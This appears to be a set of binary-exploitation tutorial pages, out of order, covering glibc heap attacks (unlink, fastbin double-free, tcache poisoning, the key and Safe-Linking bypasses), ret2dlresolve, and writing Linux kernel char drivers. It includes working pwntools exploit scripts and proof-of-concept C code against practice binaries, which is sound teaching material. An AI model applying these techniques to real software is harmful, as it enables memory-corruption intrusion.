[0x0040075d]> dc
hit breakpoint at: 0x400762
[0x00400762]> wopO 0x6441416341416241
80
from pwn import *
elf = context.binary = ELF('./heap0')
payload = (b'A' * 80 + flat(elf.sym['winner'])).replace(b'\x00', b'')
p = elf.process(argv=[payload])
print(p.clean().decode('latin-1'))
When a chunk is removed from a bin, unlink()
is called on the chunk. The unlink macro looks like this:
FD = P->fd; /* forward chunk */
BK = P->bk; /* backward chunk */
FD->bk = BK; /* update forward chunk's bk pointer */
BK->fd = FD; /* updated backward chunk's fd pointer */
Note how fd
and bk
are written to locations that depend on fd
and bk
- if we control both fd
and bk
, we can get an arbitrary write.
Consider the following example:
We want to write the value 0x1000000c
to 0x5655578c
. If we had the ability to create a fake free chunk, we could choose the values for fd
and bk
. In this example, we would set fd
to 0x56555780
(bear in mind the first 0x8
bytes in 32-bit would be for the metadata, so P->fd
is actually 8 bytes off P
and P->bk
is 12 bytes off) and bk
to 0x10000000
. Then when we unlink()
this fake chunk, the process is as follows:
FD = P->fd (= 0x56555780)
BK = P->bk (= 0x10000000)
FD->bk = BK (0x56555780 + 0xc = 0x10000000)
BK->fd = FD (0x10000000 + 0x8 = 0x56555780)
This may seem like a lot to take in. It's a lot of seemingly random numbers. What you need to understand is P->fd
just means 8 bytes off P
and P->bk
just means 12 bytes off P
.
If you imagine the chunk layout as prev_size, then size, then fd, then bk (as in the malloc_chunk struct),
then the fd
and bk
pointers point at the start of the chunk - prev_size
. So when overwriting the fd
pointer here:
FD->bk = BK (0x56555780 + 0xc = 0x10000000)
FD
points to 0x56555780
, and then 0xc
gets added on for bk
, making the write actually occur at 0x5655578c
, which is what we wanted. That is why we fake fd
and bk
values lower than the actual intended write location.
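To make the arithmetic concrete, here is a tiny sketch that just replays the example above (32-bit style offsets, so fd is at +0x8 and bk at +0xc):
#include <stdio.h>
#include <stdint.h>
struct chunk {
    uint32_t prev_size;
    uint32_t size;
    uint32_t fd;    // +0x8
    uint32_t bk;    // +0xc
};
int main() {
    struct chunk P = { 0, 0, 0x56555780, 0x10000000 };   // our faked fd and bk
    uint32_t FD = P.fd, BK = P.bk;
    // FD->bk = BK  writes BK to FD + 0xc
    printf("write %#x to %#x\n", BK, FD + 0xc);
    // BK->fd = FD  writes FD to BK + 0x8
    printf("write %#x to %#x\n", FD, BK + 0x8);
}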
The slight issue with the unlink exploit is not only does fd
get written to where you want, bk
gets written as well - and if the location you are writing either of these to is protected memory, the binary will crash.
More modern libc versions have a different version of the unlink macro, which looks like this:
FD = P->fd;
BK = P->bk;
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr (check_action, "corrupted double-linked list", P, AV);
else {
FD->bk = BK;
BK->fd = FD;
}
Here unlink()
checks the bk
pointer of the forward chunk and the fd
pointer of the backward chunk and makes sure they point to P
, which is unlikely if you fake a chunk. This quite significantly restricts where we can write using unlink.
We are still on Xenial Xerus, which means both of the checks mentioned are still relevant. The bypass for the second check (the malloc(): memory corruption (fast) size check) is given to you in the form of fake metadata already set to a suitable size. Let's check the relevant parts of the source.
char fakemetadata[0x10] = "\x30\0\0\0\0\0\0\0"; // so we can ignore the "wrong size" error
char admin[0x10] = "Nuh-huh\0";
// List of users to keep track of
char *users[15];
int userCount = 0;
The fakemetadata
variable is the fake size of 0x30
, so you can focus on the double-free itself rather than the protection bypass. Directly after this is the admin
variable, meaning if you pull the exploit off into the location of that fake metadata, you can just overwrite that as proof.
users
is a list of strings for the usernames, and userCount
keeps track of the length of the array.
void main_loop() {
while(1) {
printf(">> ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
switch (choice)
{
case 1:
createUser();
break;
case 2:
deleteUser();
break;
case 3:
complete_level();
default:
break;
}
}
}
Prompts for input, takes in input. Note that main()
itself prints out the location of fakemetadata
, so we don't have to mess around with that at all.
void createUser() {
char *name = malloc(0x20);
users[userCount] = name;
printf("%s", "Name: ");
read(0, name, 0x20);
printf("User Index: %d\nName: %s\nLocation: %p\n", userCount, users[userCount], users[userCount]);
userCount++;
}
createUser()
allocates a chunk of size 0x20
on the heap (real size is 0x30
including metadata, hence the fakemetadata
being 0x30
) then sets the array entry as a pointer to that chunk. Input then gets written there.
void deleteUser() {
printf("Index: ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
char *name = users[choice];
printf("User %d:\n\tName: %s\n", choice, name, name);
// Check user actually exists before freeing
if(choice < 0 || choice >= userCount) {
puts("Invalid Index!");
return;
}
else {
free(name);
puts("User freed!");
}
}
Get index, print out the details and free()
it. Easy peasy.
void complete_level() {
if(strcmp(admin, "admin\n")) {
puts("Level Complete!");
return;
}
}
Checks you overwrote admin
with admin
, if you did, mission accomplished!
There's literally no checks in place so we have a plethora of options available, but this tutorial is about using a double-free, so we'll use that.
First let's make a skeleton of a script, along with some helper functions:
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)
def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))
def complete():
p.sendlineafter('>> ', '3')
print(p.recvline())
As we know with the fasttop
protection, we can't allocate once then free twice in a row - we'll have to free another chunk in between.
create('yes')
create('yes')
delete(0)
delete(1)
delete(0)
Let's check the progression of the fastbin by adding a pause()
after every delete()
. We'll hook on with radare2 using
r2 -d $(pidof vuln)
Due to its size, the chunk will go into Fastbin 2, which we can check the contents of using dmhf 2
(dmhf
analyses fastbins, and we can specify number 2).
Looks like the first chunk is located at 0xd58000
. Let's keep going.
The next chunk (Chunk 1) has been added to the top of the fastbin, this chunk being located at 0xd58030
.
Boom - we free Chunk 0 again, adding it to the fastbin for the second time. radare2 is nice enough to point out there's a double-free.
Now we have a double-free, let's allocate Chunk 0 again and put some random data. Because it's also considered free, the data we write is seen as being in the fd
pointer of the chunk. Remember, the heap saves space, so fd
when free is located exactly where data is when allocated (probably explained better here).
So let's write to fd
, and see what happens to the fastbin. Remove all the pause()
instructions.
create(p64(0x08080808))
pause()
Run, debug, and dmhf 2
.
The last free()
gets reused, and our "fake" fastbin location is in the list. Beautiful.
Let's push it to the top of the list by creating two more irrelevant users. We can also parse the fakemetadata
location at the beginning of the exploit chain.
p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
log.success('Fake Metadata: ' + hex(fake_metadata))
[...]
create('junk1')
create('junk2')
pause()
The reason we have to subtract 8 off fakemetadata
is that the only thing we faked in the source is the size
field, but prev_size
is at the very front of the chunk metadata. If we point the fastbin freelist at the fakemetadata
variable it'll interpret it as prev_size
and the 8 bytes afterwards as size
, so we shift it all back 8 to align it correctly.
Now we can control where we write, and we know where to write to.
First, let's replace the location we write to with where we want to:
create(p64(fake_metadata))
Now let's finish it off by creating another user. Since we control the fastbin, this user gets written to the location of our fake metadata, giving us an almost arbitrary write.
create('\x00' * 8 + 'admin\x00')
complete()
$ python3 exploit.py
[+] Starting local process 'vuln': pid 8296
[+] Fake Metadata: 0x602088
b'Level Complete!\n'
Awesome - we completed the level!
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)
def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))
def complete():
p.sendlineafter('>> ', '3')
print(p.recvline())
p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
log.success('Fake Metadata: ' + hex(fake_metadata))
create('yes')
create('yes')
delete(0)
delete(1)
delete(0)
create(p64(fake_metadata))
create('junk1')
create('junk2')
create('\x00' * 8 + 'admin\x00')
complete()
Mixing it up a bit - you can try the 32-bit version yourself. Same principle, offsets a bit different and stuff. I'll upload the binary when I can, but just compile it as 32-bit and try it yourself :)
Starting from glibc 2.32, a new Safe-Linking mechanism was implemented to protect the singly-linked lists (the fastbins and tcachebins). The theory is to protect the fd
pointer of free chunks in these bins with a mangling operation, making it more difficult to overwrite it with an arbitrary value.
Every single fd
pointer is protected by the PROTECT_PTR macro, which is undone by REVEAL_PTR:
Here, pos
is the location of the current chunk and ptr
the location of the chunk we are pointing to (which is NULL if the chunk is the last in the bin). Once again, we are using ASLR to protect! The >>12
gets rid of the predictable last 12 bits of ASLR, keeping only the random upper 52 bits (or effectively 28, really, as the upper ones are pretty predictable):
It's a very rudimentary protection - we use the current location and the location we point to in order to mangle it. From a programming standpoint, it has virtually no overhead or performance impact. We can see that PROTECT_PTR
has been implemented in tcache_put() as well as in two locations in _int_free()
(for fastbins). You can find REVEAL_PTR
used wherever those pointers are read back.
So, what does this mean to an attacker?
Again, heap leaks are key. If we get a heap leak, we know both parts of the XOR in PROTECT_PTR
, and we can easily recreate it to fake our own mangled pointer.
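A quick sketch of that recreation (the addresses here are made up - in a real exploit they would come from your heap leak):
#include <stdio.h>
#include <stdint.h>
// the same operation as glibc's PROTECT_PTR/REVEAL_PTR macros
uint64_t protect_ptr(uint64_t pos, uint64_t ptr) {
    return (pos >> 12) ^ ptr;
}
int main() {
    uint64_t fd_addr = 0x55555555a2a0;   // leaked address of the chunk's fd field
    uint64_t target  = 0x55555555b000;   // where we want the next allocation to land
    uint64_t mangled = protect_ptr(fd_addr, target);
    printf("write %#lx into fd\n", mangled);
    // glibc demangles with REVEAL_PTR, i.e. PROTECT_PTR(&fd, fd), recovering the target
    printf("glibc recovers %#lx\n", protect_ptr(fd_addr, mangled));
}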
It might be tempting to say that a partial overwrite is still possible, but there is a new security check that comes along with this Safe-Linking mechanism, the alignment check. This check ensures that chunks are 16-byte aligned and is only relevant to singly-linked lists (like all of Safe-Linking). A quick Ctrl-F for unaligned
in malloc.c will bring up plenty of different locations. The most important ones for us as attackers are probably the one in tcache_get()
and the ones in _int_malloc()
.
When trying to get a chunk e
out of the tcache, alignment is checked.
There are three checks here. First in REMOVE_FB, the macro for removing a chunk from a fastbin:
Once on the victim chunk taken out of the fastbin:
And lastly on every fastbin chunk moved into the tcache during the stashing process:
_int_free()
checks the alignment if the tcache_entry
key is already set to the value it's meant to be, while doing the whole double-free iteration check:
When all the fastbins are consolidated into the unsorted bin by malloc_consolidate(), they are checked for alignment as well:
Not super important for attackers, but fastbin chunks are checked for alignment in a handful of other internal functions too, and tcache chunks get a final check in tcache_thread_shutdown().
You may notice some of them use aligned_OK while others use misaligned_chunk.
The macros are defined side-by-side, but really aligned_OK
is for addresses while misaligned_chunk
is for chunks.
They are defined as such:
MALLOC_ALIGNMENT
is defined for i386 as 16
. In binary that's 10000
, so MALLOC_ALIGN_MASK
is 1111
and the final four bits are checked. This results in 16-byte alignment, as expected.
This alignment check means the demangled pointer has to end in four zero bits, so a blind attempt to brute-force a mangled fd only has a 1/16 chance of even passing the alignment check.
Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.
This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init
function looks like this:
A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev
, but if you pass 0
it is automatically assigned an unused major number.
We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro
.
Note that on an error it calls class_destroy
and unregister_chrdev
:
These additional classes and devices have to be cleaned up in the intro_exit
function, and we mark the major number as available:
In intro_init
, the first line may have been confusing:
The third parameter fops
is where all the magic happens, allowing us to create handlers for operations such as read
and write
. A really simple one would look something like:
The parameters to intro_read
may be a bit confusing, but the 2nd and 3rd ones line up to the 2nd and 3rd parameters for the read()
function itself:
We then use the function copy_to_user
to write QWERTY
to the buffer passed in as a parameter!
Simply use sudo insmod
to load it.
Create a really basic exploit.c
:
If the module is successfully loaded, the read()
call should read QWERTY
into buffer
:
Success!
New and efficient heap management
Starting in glibc 2.26, a new heap feature called the tcache was released. The tcache was designed to be a performance booster, and the operation is very simple: every chunk size (up to size 0x410) has its own tcache bin, which can store up to 7 chunks. When a chunk of a specific size is allocated, the tcache bin is searched first. When it is freed, the chunk is added to the tcache bin; if it is full, it then goes to the standard fastbin/unsortedbin.
The tcache bin acts like a fastbin - it is a singly-linked list of free chunks of a specific size. The handling of the list, using fd
pointers, is identical. As you can expect, the attacks on the tcache are also similar to the attacks on fastbins.
Ironically, years of defenses that were implemented into the fastbins - such as the fasttop double-free check - were ignored in the initial implementation of the tcache. This means that using the heap to attack a binary running under glibc 2.27 is easier than attacking one running under 2.25!
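As a rough sketch of just how forgiving the original tcache was (this assumes an early tcache glibc such as 2.26/2.27, before the key field existed), a straight double-free goes through and the next pointer can then be poisoned:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main() {
    uint64_t target = 0;                   // hypothetical address we want malloc to hand back
    char *a = malloc(0x40);
    free(a);
    free(a);                               // no abort - the tcache has no double-free check yet
    char *b = malloc(0x40);                // returns a, which is still in the tcache bin
    *(uint64_t *)b = (uint64_t)&target;    // overwrite a's next pointer
    malloc(0x40);                          // returns a again
    printf("%p\n", malloc(0x40));          // returns &target
}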
Resolving our own libc functions
During a ret2dlresolve, the attacker tricks the binary into resolving a function of its choice (such as system
) into the PLT. This then means the attacker can use the PLT function as if it was originally part of the binary, bypassing ASLR (if present) and requiring no libc leaks.
Dynamically-linked ELF objects import libc
functions when they are first called using the PLT and GOT. During the relocation of a runtime symbol, RIP will jump to the PLT and attempt to resolve the symbol. During this process a "resolver" is called.
The PLT jumps to wherever the GOT points. Originally, before the GOT is updated, it points back to the instruction after the jmp
in the PLT to resolve it.
In order to resolve the functions, there are 3 structures that need to exist within the binary. Faking these 3 structures could enable us to trick the linker into resolving a function of our choice, and we can also pass parameters in (such as /bin/sh
) once resolved.
There are 3 structures we need to fake.
The JMPREL
segment (.rel.plt
) stores the Relocation Table, which maps each entry to a symbol.
These entries are of type Elf32_Rel
:
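For reference, this is how the struct is laid out (as in elf.h), along with the macros used to unpack info:
typedef struct {
    Elf32_Addr r_offset;    /* the GOT entry to fill - the offset column */
    Elf32_Word r_info;      /* (symbol index << 8) | relocation type     */
} Elf32_Rel;
#define ELF32_R_SYM(info)  ((info) >> 8)
#define ELF32_R_TYPE(info) ((unsigned char) (info))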
The column name
corresponds to our symbol name. The offset
is the GOT entry for our symbol. info
stores additional metadata.
Note that due to this the R_SYM
of gets
is 1
as 0x107 >> 8 = 1
.
Much simpler - just a table of strings for the names.
Symbol information is stored here in an Elf32_Sym
struct:
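This is (essentially) the elf.h definition - note the total size of 16 bytes, which comes up again below:
typedef struct {
    Elf32_Word    st_name;    /* offset of the symbol's name in STRTAB */
    Elf32_Addr    st_value;
    Elf32_Word    st_size;
    unsigned char st_info;
    unsigned char st_other;
    Elf32_Half    st_shndx;
} Elf32_Sym;                  /* 16 bytes in total */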
The most important value here is st_name
as this gives the offset in STRTAB of the symbol name. The other fields are not relevant to the exploit itself.
We now know we can get the STRTAB
offset of the symbol's string using the R_SYM
value we got from the JMPREL
, combined with SYMTAB
:
Here we're reading SYMTAB + R_SYM * size (16)
, and it appears that the offset (the SYMTAB
st_name
variable) is 0x10
.
And if we read that offset on STRTAB
, we get the symbol's name!
Let's hop back to the GOT and PLT for a slightly more in-depth look.
If the GOT entry is unpopulated, we push the reloc_offset
value and jump to the beginning of the .plt
section. A few instructions later, the dl-resolve()
function is called, with reloc_offset
being one of the arguments. It then uses this reloc_offset
to calculate the relocation and symtab entries.
Writing a Char Module is surprisingly simple. First, we specify what happens on init
(loading of the module) and exit
(unloading of the module). We need some special headers for this.
It looks simple, because it is simple. For now, anyway.
First we set the license, because otherwise we get a warning, and I hate warnings. Next we tell the module what to do on load (intro_init()
) and unload (intro_exit()
). Note we put parameters as void
, this is because kernel modules are very picky about function prototypes (even if just void).
We then register the purposes of the functions using module_init()
and module_exit()
.
Note that we use printk
rather than printf
. GLIBC doesn't exist in kernel mode, and instead we use C's in-built kernel functionality. KERN_ALERT
specifies the priority of the message sent; there are several other log levels, such as KERN_INFO.
Compiling a Kernel Object can seem a little more complex as we use a Makefile, but it's surprisingly simple:
$(MAKE)
is a special flag that effectively calls make
, but it propagates all the same flags that our Makefile
was called with. So, for example, if we call
Then $(MAKE)
will become make -j 8
. Essentially, $(MAKE)
is make
, which compiles the module. The files produced are defined at the top as obj-m
. Note that compilation is unique per kernel, which is why the compiling process uses your kernel's own build directory (/lib/modules/$(uname -r)/build).
Now we've got a ko
file compiled, we can add it to the list of active modules:
If it's successful, there will be no response. But where did it print to?
Remember, the kernel program has no concept of userspace; it does not know you ran it, nor does it bother communicating with userspace. Instead, this code runs in the kernel, and we can check the output using sudo dmesg
.
Here we grab the last line using tail
- as you can see, our printk
is called!
Now let's unload the module:
And there our intro_exit
is called.
A primitive double-free protection
Starting from glibc 2.29, the tcache was hardened by the addition of a second field in the tcache_entry
struct, the key:
It's a pointer to a tcache_perthread_struct
. In the tcache_put() function, we can see what key
is set to:
When a chunk is freed and tcache_put()
is called on it, the key
field is set to the location of the tcache_perthread_struct
. Why is this relevant? Let's check _int_free():
The chunk being freed is variable e
. We can see here that before tcache_put()
is called on it, there is a check being done:
The check determines whether the key
field of the chunk e
is set to the address of the tcache_perthread_struct
already. Remember that this happens when it is put into the tcache with tcache_put()
! If the pointer is already there, there is a very high chance that it's because the chunk has already been freed, in which case it's a double-free!
It's not a 100% guaranteed double-free though - as the comment above it says:
This test succeeds on double free. However, we don't 100% trust it (it also matches random payload data at a 1 in 2^<size_t> chance), so verify it's not an unlikely coincidence before aborting.
There is a 1/2^<size_t>
chance that the key
being tcache_perthread_struct
already is a coincidence. To verify, it simply iterates through the tcache bin and compares the chunks to the one being freed:
Iterates through each entry, calls it tmp
and compares it to e
. If equal, it detected a double-free.
You can think of the key
as an effectively random value (due to ASLR) that gets checked against, and if it's the correct value then something is suspicious.
So, what can we do against this? Well, this protection doesn't affect us that much - it stops a simple double-free, but if we have any kind of UAF primitive we can easily overwrite e->key
. Even with a single byte, we still have a 255/256 chance of overwriting it to something that doesn't match key
. Creating fake tcache chunks doesn't matter much either, as even in the latest glibc version there are very few checks on the chunks themselves (beyond the alignment check), meaning tcache poisoning is still doable.
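A minimal sketch of the key bypass (assuming glibc 2.29 or later, and assuming we have some way of writing to the chunk after it has been freed - the UAF itself):
#include <stdlib.h>
int main() {
    char *a = malloc(0x40);
    free(a);        // a->key now holds the tcache (or, on 2.34+, tcache_key) value
    a[8] = 0x41;    // UAF write clobbers one byte of key, so e->key == tcache no longer holds
    free(a);        // no abort - the chunk is now in the tcache bin twice
}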
In fact, the key
can even be helpful for us - the fd
pointer of the tcache chunk is mangled, so a UAF does not guarantee a heap leak. The key
field is not mangled, so if we can leak the location of tcache_perthread_struct
instead, this gives us a heap leak as it is always located at heap_base + 0x10
.
In glibc 2.34, the key
field was changed. Instead of tcache_put()
setting key
to the location of the tcache_perthread_struct
, it sets it to tcache_key:
What is tcache_key
? It's defined and set directly below, in the tcache_key_initialize() function:
It attempts to call __getrandom()
, which is defined as a generic stub and implemented for Linux; there it just uses a syscall to read n
random bytes. If that fails for some reason, it calls the random_bits() function instead, which generates a pseudo-random number seeded by the time. Long story short: tcache_key
is random. The double-free check itself works exactly the same way - it's just that the key is now completely random rather than based on ASLR. As the comment above it says:
The value of tcache_key does not really have to be a cryptographically secure random number. It only needs to be arbitrary enough so that it does not collide with values present in applications. [...]
This isn't a huge change - it's still only straight double-frees that are affected. We can no longer leak the heap via the key
, however.
#define DEVICE_NAME "intro"
#define CLASS_NAME "intro"
// setting up the device
int major;
static struct class* my_class = NULL;
static struct device* my_device = NULL;
static int __init intro_init(void) {
major = register_chrdev(0, DEVICE_NAME, &fops); // explained later
if ( major < 0 )
printk(KERN_ALERT "[Intro] Error assigning Major Number!");
// Register device class
my_class = class_create(THIS_MODULE, CLASS_NAME);
if (IS_ERR(my_class)) {
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to register device class\n");
}
// Register the device driver
my_device = device_create(my_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
if (IS_ERR(my_device)) {
class_destroy(my_class);
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to create the device\n");
}
return 0;
}
static void __exit intro_exit(void) {
device_destroy(my_class, MKDEV(major, 0)); // remove the device
class_unregister(my_class); // unregister the device class
class_destroy(my_class); // remove the device class
unregister_chrdev(major, DEVICE_NAME); // unregister the major number
printk(KERN_INFO "[Intro] Closing!\n");
}
major = register_chrdev(0, DEVICE_NAME, &fops);
static ssize_t intro_read(struct file *filp, char __user *buffer, size_t len, loff_t *off) {
printk(KERN_ALERT "reading...");
copy_to_user(buffer, "QWERTY", 6);
return 0;
}
static struct file_operations fops = {
.read = intro_read
};
ssize_t read(int fd, void *buf, size_t count);
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/device.h>
#include <linux/uaccess.h>
#define DEVICE_NAME "intro"
#define CLASS_NAME "intro"
MODULE_AUTHOR("ir0nstone");
MODULE_DESCRIPTION("Interactive Drivers");
MODULE_LICENSE("GPL");
// setting up the device
int major;
static struct class* my_class = NULL;
static struct device* my_device = NULL;
static ssize_t intro_read(struct file *filp, char __user *buffer, size_t len, loff_t *off) {
printk(KERN_ALERT "reading...");
copy_to_user(buffer, "QWERTY", 6);
return 0;
}
static struct file_operations fops = {
.read = intro_read
};
static int __init intro_init(void) {
major = register_chrdev(0, DEVICE_NAME, &fops);
if ( major < 0 )
printk(KERN_ALERT "[Intro] Error assigning Major Number!");
// Register device class
my_class = class_create(THIS_MODULE, CLASS_NAME);
if (IS_ERR(my_class)) {
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to register device class\n");
}
// Register the device driver
my_device = device_create(my_class, NULL, MKDEV(major, 0), NULL, DEVICE_NAME);
if (IS_ERR(my_device)) {
class_destroy(my_class);
unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT "[Intro] Failed to create the device\n");
}
return 0;
}
static void __exit intro_exit(void) {
device_destroy(my_class, MKDEV(major, 0)); // remove the device
class_unregister(my_class); // unregister the device class
class_destroy(my_class); // remove the device class
unregister_chrdev(major, DEVICE_NAME); // unregister the major number
printk(KERN_INFO "[Intro] Closing!\n");
}
module_init(intro_init);
module_exit(intro_exit);
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
int main() {
int fd = open("/dev/intro", O_RDWR); // Open the device with RW access
printf("FD: %d\n", fd); // print the file descriptor
char buffer[6];
memset(&buffer, 'A', 6); // fill with As
printf("%s\n", buffer); // print
read(fd, buffer, 6); // read from module
printf("%s\n", buffer); // print again
}
$ ./exploit
FD: 3
AAAAAA
QWERTY
#include <linux/init.h>
#include <linux/module.h>
MODULE_LICENSE("Mine!");
static int intro_init(void) {
printk(KERN_ALERT "Custom Module Started!\n");
return 0;
}
static void intro_exit(void) {
printk(KERN_ALERT "Custom Module Stopped :(\n");
}
module_init(intro_init);
module_exit(intro_exit);
obj-m += intro.o
all:
$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
$ make -j 8
$ sudo insmod test.ko
$ sudo dmesg | tail -n 1
[ 3645.657331] Custom Module Started!
$ sudo rmmod test
$ sudo dmesg | tail -n 1
[ 4046.904898] Custom Module Stopped :(
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
if (tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
}
#endif
if (__glibc_unlikely (e->key == tcache))
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache_key;
e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
static void tcache_key_initialize (void)
{
if (__getrandom (&tcache_key, sizeof(tcache_key), GRND_NONBLOCK)
!= sizeof (tcache_key))
{
tcache_key = random_bits ();
#if __WORDSIZE == 64
tcache_key = (tcache_key << 32) | random_bits ();
#endif
}
}
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("malloc(): unaligned tcache chunk detected");
if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \
malloc_printerr ("malloc(): unaligned fastbin chunk detected");
if (__glibc_unlikely (misaligned_chunk (victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 2");
if (__glibc_unlikely (misaligned_chunk (tc_victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx]; tmp; tmp = REVEAL_PTR (tmp->next))
{
if (__glibc_unlikely (!aligned_OK (tmp)))
malloc_printerr ("free(): unaligned chunk detected in tcache 2");
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
}
if (__glibc_unlikely (misaligned_chunk (p)))
malloc_printerr ("malloc_consolidate(): "
"unaligned fastbin chunk detected");
if (__glibc_unlikely (misaligned_chunk (p)))
malloc_printerr ("<funcname>(): "
"unaligned fastbin chunk detected")
if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("tcache_thread_shutdown(): "
"unaligned tcache chunk detected");
#define aligned_OK(m) (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
#define misaligned_chunk(p) \
((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
& MALLOC_ALIGN_MASK)
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
A more useful way to interact with the driver
Linux contains a syscall called ioctl
, which is often used to communicate with a driver. ioctl()
takes three parameters:
File Descriptor fd
an unsigned int
an unsigned long
The driver can be adapted to make the latter two virtually anything - perhaps a pointer to a struct or a string. In the driver source, the code looks along the lines of:
static ssize_t ioctl_handler(struct file *file, unsigned int cmd, unsigned long arg) {
printk("Command: %d; Argument: %d", cmd, arg);
return 0;
}
But if you want, you can interpret cmd
and arg
as pointers if that is how you wish your driver to work.
To communicate with the driver in this case, you would use the ioctl()
function, which you can import in C:
#include <sys/ioctl.h>
// [...]
ioctl(fd, 0x100, 0x12345678); // arg could just as easily be a pointer to a string or struct
And you would have to update the file_operations
struct:
static struct file_operations fops = {
.ioctl = ioctl_handler
};
On modern Linux kernel versions, .ioctl
has been removed and replaced by .unlocked_ioctl
and .compat_ioctl
. The former is the replacement for .ioctl
, with the latter allowing 32-bit processes to perform ioctl
calls on 64-bit systems. As a result, the new file_operations
is likely to look more like this:
static struct file_operations fops = {
.compat_ioctl = ioctl_handler,
.unlocked_ioctl = ioctl_handler
};
Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.
$ apt-get install flex bison libelf-dev
git clone https://github.com/torvalds/linux --depth=1
Use --depth 1
to only get the last commit.
Remove the current compilation configurations, as they are quite complex for our needs
$ cd linux
$ rm -f .config
Now we can create a minimal configuration, with almost all options disabled. A .config
file is generated with the least features and drivers possible.
$ make allnoconfig
YACC scripts/kconfig/parser.tab.[ch]
HOSTCC scripts/kconfig/lexer.lex.o
HOSTCC scripts/kconfig/menu.o
HOSTCC scripts/kconfig/parser.tab.o
HOSTCC scripts/kconfig/preprocess.o
HOSTCC scripts/kconfig/symbol.o
HOSTCC scripts/kconfig/util.o
HOSTLD scripts/kconfig/conf
#
# configuration written to .config
#
We create a kconfig
file with the options we want to enable. An example is the following:
CONFIG_64BIT=y
CONFIG_SMP=y
CONFIG_PRINTK=y
CONFIG_PRINTK_TIME=y
CONFIG_PCI=y
# We use an initramfs for busybox with elf binaries in it.
CONFIG_BLK_DEV_INITRD=y
CONFIG_RD_GZIP=y
CONFIG_BINFMT_ELF=y
CONFIG_BINFMT_SCRIPT=y
# This is for /dev file system.
CONFIG_DEVTMPFS=y
# For the power-down button (triggered by qemu's `system_powerdown` command).
CONFIG_INPUT=y
CONFIG_INPUT_EVDEV=y
